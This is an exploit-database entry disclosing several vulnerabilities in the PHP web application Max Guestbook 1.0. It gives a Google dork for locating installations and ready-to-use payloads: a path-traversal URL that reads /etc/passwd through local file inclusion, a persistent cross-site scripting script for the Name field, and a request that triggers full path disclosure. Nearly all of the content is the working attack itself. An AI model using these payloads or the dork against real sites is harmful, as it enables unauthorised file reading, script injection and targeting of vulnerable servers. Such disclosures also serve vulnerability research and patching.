Max Guestbook 1.0 - Multiple Vulnerabilities
Author: n0tch
type: webapps
platform: php
port:
date_added: 2012-03-14
date_updated: 2012-03-15
verified: 1
codes: OSVDB-80598;OSVDB-80597;OSVDB-80596
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.commaxGuestbook.zip
# Exploit Title: Maxs Guestbook
# Google Dork: "Powered by PHP F1"
# Date: 14/03/2012
# Author: n0tch aka andmuchmore
# Software Link: http://www.phpf1.com/download.html?dl=18
# Version: 1.0
# Tested on: Windows 7 / Linux(Ubuntu)
+[-- LFI --]+
http://localhost/max/index.php?page=../../../../../../../../../../../../../../../../../etc/passwd%00
+[-- Persistent XSS --]+
Vulnerable Field = "Name"
Payload syntax: <script>alert('hello')</script>
+[-- FPD --]+
http://localhost/max/index.php?page[]=2
+[-- Shoutz --]+
All the belegit crew..